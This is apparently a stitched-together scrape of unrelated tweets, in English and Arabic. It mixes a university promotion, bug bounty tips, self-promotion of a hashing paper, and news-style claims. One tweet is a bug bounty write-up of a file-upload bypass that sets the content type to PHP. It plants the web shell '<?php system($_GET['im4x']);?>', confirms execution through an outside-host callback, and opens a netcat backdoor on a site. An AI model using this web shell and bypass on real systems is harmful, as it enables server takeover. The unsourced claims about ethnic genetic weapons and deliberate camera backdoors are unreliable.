Raed Shafei says Stetson’s small classes and helpful professors prepared him for a successful career. With his training, he is eager to contribute to the ambitious Saudi Vision 2030.
Read more: https://t.co/j4PmM3WkED
#GoHatters | #StetsonU | #Saudi2030
6 things to look out for when you come across an OAuth flow:
1. If it's possible to redirect to any endpoint on the target domain, look for endpoints that pass all URL parameters through, such as open redirects.
الصين تُصدر تحذير شديد لمواطنيها من أسلحة جينية حديثة قادرة على استهداف أعراق محددة بشكل انتقائي بهدف ��لقضاء عليهم في حال نشوب حرب كبيرة.
جهاز أمن الدولة الصيني أصدر بيان حذر فيه من منظمة أجنبية تريد تجنيد الصينيين لإجراء أبحاث على عِرقهم لجمع بياناتهم مما قد يترتب عليه مخاطر كُبرى على الشعب الصيني في حال تم استخدام ذلك السلاح الذي وُصف بأنه من أسلحة الدمار الشامل.
جهاز أمن الدولة الصيني لم يذكر اسم تلك الدولة أو المنظمة الأجنبية.
Let me know your thoughts about my new project that I’m working on. The Ibn Maryam Data Integrity Tokens. You can find more information in the repository below.
https://t.co/kMStkdpJTR
#bugbountytips#bugbounty#cybersecurity#Pentesting#Hacking#bugcrowd#Hackerone#IDOR#XSS#SQLI
Blind #RCE
When you find a file upload center inside any site
You will definitely look for RCE because it is considered the most important and dangerous security vulnerability that gives you access to a server and a backdoor.
Well, I decided to upload my own picture on one of the private sites
So I got the end point of his photos, which are uploaded to the same site without the use of third-party
https://t.co/DGoZFKffrO
Therefore, I decided to send the request to the Burp
But I found the content of the image does not appear in the burp
which only appears in image format
{"content-type":"image/jpeg",
"file_ext":"jpeg"}
Where I changed it to to
{"content-type":"application/x-httpd-php",
"file_ext":"php"}
I found that the image was uploaded in .php format correctly
So I created a RCE.jpg file with the content:-
<?php system($_GET['im4x']);?>
im4x: It is the variable that we change in order to give the server commands
I also uploaded the RCE.jpg file
I intercepted the request and changed it to PHP
The site was not showing me what I was printing in the im4x variable like <whoami, ls , pwd , .. etc >
So I used a command that forces the site to visit another site (you can use Burp Collaborator)
https://t.co/bUbcSrTmRb+<Burp Collaborator>
I got a response, the link was visited, so I made sure the site accepts injections
I opened my back door easily with NC
retweet, please ❤️❤️
Now you can view and download a copy of my paper “Ibn Omar Hash Algorithm” a hashing algorithm designed and developed by me. For further questions please email me at [email protected]#IEEE#CICN2022
https://t.co/SdIJxGXh2E
Now you can view and download a copy of my paper “Ibn Omar Hash Algorithm” a hashing algorithm designed and developed by me. For further questions please email me at [email protected]#IEEE#CICN2022
https://t.co/SdIJxGXh2E
@q8fawazo الجهل مشكلة بطايق البنك تعمل عن طريق الـNFC واللي بيكون فيه UID يعني كل مرة بتقرا البطاقة بالجهاز بيكون الـUID مختلف وعندك اجزاء من الثانية حتى تستعمل القراية اللي عندك قبل ما تنتهي كذلك Apple Pay. اما RFIDs زي الـ key fob مافيها نظام امان اصلًا.
Master OTW Cyberwarrior Wisdom
"US Government Bans Hikvision and Dahua IP Cameras" Nov 28, 2022
Both of these IP Cameras Have Backdoors Purposely Placed for Spying.
Every nation should Ban these products
#otwwisdom